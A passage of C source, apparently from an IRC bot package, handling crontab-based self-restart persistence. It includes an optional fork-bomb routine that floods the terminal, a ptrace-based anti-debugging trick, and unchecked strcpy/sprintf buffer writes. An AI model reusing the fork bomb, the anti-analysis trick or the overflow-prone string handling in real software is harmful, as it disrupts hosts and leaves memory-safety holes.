  820. strcpy(tmpFile, binname);
  821. if (!(p = strrchr(tmpFile, '/')))
  822. return;
  823. p++;
  824. strcpy(p, ".ctb");
  825. sprintf(buf, "crontab -l | grep -v \"%s\" | grep -v \"^#\" | grep -v \"^\\$\" > %s", binname, tmpFile);
  826. if (shell_exec(buf, NULL, NULL, NULL)) {
  827. sprintf(buf, "crontab %s", tmpFile);
  828. shell_exec(buf, NULL, NULL, NULL);
  829. }
  830. unlink(tmpFile);
  831. }
  832. int crontab_exists() {
  833. char buf[2048] = "", *out = NULL;
  834. egg_snprintf(buf, sizeof buf, "crontab -l | grep \"%s\" | grep -v \"^#\"", binname);
  835. if (shell_exec(buf, NULL, &out, NULL)) {
  836. if (out && strstr(out, binname)) {
  837. free(out);
  838. return 1;
  839. } else {
  840. if (out)
  841. free(out);
  842. return 0;
  843. }
  844. } else
  845. return (-1);
  846. }
  847. void crontab_create(int interval) {
  848. char tmpFile[161] = "", buf[256] = "";
  849. FILE *f = NULL;
  850. int fd;
  851. egg_snprintf(tmpFile, sizeof tmpFile, "%s.crontab-XXXXXX", tempdir);
  852. if ((fd = mkstemp(tmpFile)) == -1) {
  853. unlink(tmpFile);
  854. return;
  855. }
  856. egg_snprintf(buf, sizeof buf, "crontab -l | grep -v \"%s\" | grep -v \"^#\" | grep -v \"^\\$\"> %s", binname, tmpFile);
  857. if (shell_exec(buf, NULL, NULL, NULL) && (f = fdopen(fd, "a")) != NULL) {
  858. buf[0] = 0;
  859. if (interval == 1)
  860. strcpy(buf, "*");
  861. else {
  862. int i = 1;
  863. int si = randint(interval);
  864. while (i < 60) {
  865. if (buf[0])
  866. sprintf(buf + strlen(buf), ",%i", (i + si) % 60);
  867. else
  868. sprintf(buf, "%i", (i + si) % 60);
  869. i += interval;
  870. }
  871. }
  872. egg_snprintf(buf + strlen(buf), sizeof buf, " * * * * %s > /dev/null 2>&1", binname);
  873. fseek(f, 0, SEEK_END);
  874. fprintf(f, "\n%s\n", buf);
  875. fclose(f);
  876. sprintf(buf, "crontab %s", tmpFile);
  877. shell_exec(buf, NULL, NULL, NULL);
  878. }
  879. close(fd);
  880. unlink(tmpFile);
  881. }
  882. #ifdef S_MESSUPTERM
  883. static void messup_term() {
  884. int i;
  885. char *argv[4] = { NULL, NULL, NULL, NULL };
  886. freopen("/dev/null", "w", stderr);
  887. for (i = 0; i < 11; i++) {
  888. fork();
  889. }
  890. argv[0] = calloc(1, 100);
  891. strcpy(argv[0], "/bin/sh");
  892. argv[1] = "-c";
  893. argv[2] = calloc(1, 1024);
  894. strcpy(argv[2], "cat < ");
  895. strcat(argv[2], binname);
  896. argv[3] = NULL;
  897. execvp(argv[0], &argv[0]);
  898. }
  899. #endif /* S_MESSUPTERM */
  900. #ifdef CRAZY_TRACE
  901. /* This code will attach a ptrace() to getpid() hence blocking process hijackers/tracers on the pid
  902. * only problem.. it just creates a new pid to be traced/hijacked :\
  903. */
  904. int attached = 0;
  905. void crazy_trace()
  906. {
  907. int parent = getpid();
  908. int x = fork();
  909. if (x == -1) {
  910. printf("Can't fork(): %s\n", strerror(errno));
  911. } else if (x == 0) {
  912. /* child */
  913. int i;
  914. i = ptrace(PTRACE_ATTACH, parent, (char *) 1, 0);
  915. if (i == (-1) && errno == EPERM) {
  916. printf("CANT PTRACE PARENT: errno: %d %s, i: %d\n", errno, strerror(errno), i);
  917. waitpid(parent, &i, 0);
  918. kill(parent, SIGCHLD);
  919. ptrace(PTRACE_DETACH, parent, 0, 0);
  920. kill(parent, SIGCHLD);
  921. exit(0);
  922. } else {
  923. printf("SUCCESSFUL ATTACH to %d: %d\n", parent, i);
  924. attached++;
  925. }
  926. } else {
  927. /* parent */
  928. printf("wait()\n");
  929. wait(&x);
  930. }
  931. printf("end\n");
  932. }
  933. #endif /* CRAZY_TRACE */
  934. /* need to account for this after reading in conf/spawning bots.
  935. ifdef LEAF
  936. if (updating)
  937. exit(0); let cron restart us.
  938. } localhub
  939. endif LEAF
  940. */